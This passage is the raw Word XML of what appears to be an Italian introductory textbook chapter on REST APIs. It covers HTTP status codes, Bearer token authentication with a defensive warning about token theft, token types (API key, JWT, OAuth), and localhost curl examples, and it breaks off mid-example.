      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> valgono identici per le API. Aggiungiamo qualche codice specifico che vedrai spesso nel mondo API:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="161" w:name="successo-2xx"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successo (2xx)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Tutto bene, nel body c’è la risposta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">201 Created</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Hai creato una nuova risorsa (di solito risposta a una POST). Convenzionalmente, la risposta include nell’header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Location</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">l’URL della risorsa appena creata:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Location: /utenti/43</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">204 No Content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Operazione riuscita ma non c’è nulla da restituire. Tipico di una DELETE riuscita.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="161"/>
    <w:bookmarkStart w:id="162" w:name="errore-del-client-4xx"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errore del client (4xx)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">400 Bad Request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— La tua richiesta è formata male: JSON invalido, campo obbligatorio mancante, tipo sbagliato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">401 Unauthorized</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Non sei autenticato. Manca un token, è scaduto, è invalido. Il client deve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rifare il login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">403 Forbidden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Sei autenticato, ma non hai il permesso. Il client lo è e basta: rifare il login non serve.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">404 Not Found</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— La risorsa non esiste.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">409 Conflict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— La richiesta è valida ma in conflitto con lo stato attuale (es. registrare un utente con uno username già esistente).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">422 Unprocessable Entity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— La richiesta è formalmente corretta (JSON valido) ma semanticamente no (es. email senza il @).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1073"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">429 Too Many Requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Stai facendo troppe richieste, rallenta. Tipicamente accompagnato dall’header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Retry-After</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="162"/>
    <w:bookmarkStart w:id="163" w:name="errore-del-server-5xx"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errore del server (5xx)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">500 Internal Server Error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Qualcosa è esploso nel codice del server. Per uno sviluppatore: andare a guardare i log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">502 Bad Gateway</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">503 Service Unavailable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">504 Gateway Timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Problemi di infrastruttura: il server è giù, sovraccarico, o un servizio interno non risponde.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anti-pattern frequente da evitare.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Alcune API restituiscono sempre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con un campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">success: false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel body in caso di errore. È sbagliato: rompe la regola che il codice di stato è la fonte di verità sull’esito. Significa che ogni client deve sempre esaminare il body per sapere se l’operazione è andata bene. Strumenti automatici (proxy, gateway, monitoring) si confondono.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Usa sempre il codice di stato corretto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="163"/>
    <w:bookmarkEnd w:id="164"/>
    <w:bookmarkStart w:id="166" w:name="b.9-autenticazione-delle-api"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.9 Autenticazione delle API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abbiamo detto che REST è stateless, e quindi le API tipicamente non usano cookie di sessione. Come fanno allora a sapere chi sei?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La risposta breve: il client invia ad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ogni richiesta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di autenticazione, di solito nell’header</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/messaggi HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: bancapiccola.it</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXV...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La parola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bearer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in italiano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">portatore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) indica che chi presenta il token viene riconosciuto come l’utente associato a quel token. Esattamente come il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">biglietto del treno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il controllore non controlla la tua identità, controlla che tu abbia un biglietto valido. Se lo perdi, chi lo trova può viaggiare al posto tuo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Conseguenza di sicurezza enorme.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I token Bearer sono dei</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">biglietti al portatore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se vengono rubati (per esempio attraverso un attacco XSS, </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, o memorizzandoli in posti sbagliati come localStorage di un browser vulnerabile), l’attaccante diventa l’utente. Per questo i token devono essere trasmessi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">solo su HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, devono avere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">scadenze brevi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e devono poter essere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">revocati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in caso di compromissione.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="165" w:name="quali-tipi-di-token-esistono"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quali tipi di token esistono</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In ordine di complessità:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">API Key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: una stringa lunga, statica, generata dal server e consegnata allo sviluppatore. Esempi: chiavi di accesso ai servizi cloud, alle API pubbliche di OpenWeather, di OpenAI. Pro: semplici. Contro: se compromesse, devono essere rigenerate manualmente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">JWT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">JSON Web Token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): un token strutturato, firmato crittograficamente, che contiene</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">informazioni sull’utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dentro di sé (id, ruolo, scadenza). Il server non deve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ricordare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il token: gli basta verificarne la firma. È diventato lo standard de facto per le API moderne.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ha però vulnerabilità importanti se implementato male</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: vedremo la lista nera al secondo anno.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1075"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OAuth 2.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un protocollo complesso per delegare l’autenticazione a un servizio esterno (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Login con Google</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Login con Facebook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Anche questo lo studierai più avanti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per il primo anno, ci basta sapere che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">le API moderne usano token Bearer nell’header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La sicurezza delle implementazioni di token sarà materia avanzata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="165"/>
    <w:bookmarkEnd w:id="166"/>
    <w:bookmarkStart w:id="169" w:name="X8e8c9b781f9fa8e5399838c5f18a42dbf73ee05"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3b.10 Strumenti per testare le API: curl e REST Client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">parlare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a un’API REST come farebbe un programma client, ci servono strumenti. Ne useremo due, complementari:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="167" w:name="strumento-1-curl-testuale-da-terminale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Strumento 1: curl (testuale, da terminale)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo conosci già dal </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. È perfetto per richieste rapide, per scriptare test, per essere sicuro di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vedere il protocollo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">senza astrazioni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempi pratici (testabili appena MiniBlog avrà l’API; per ora leggi):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># GET semplice</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># GET con header personalizzato</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abc123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># POST con body JSON</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/api/messaggi</w:t>
        </w:r>
      </w:hyperlink>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'{"testo": "Ciao da curl!"}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Vedere anche gli header della risposta</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
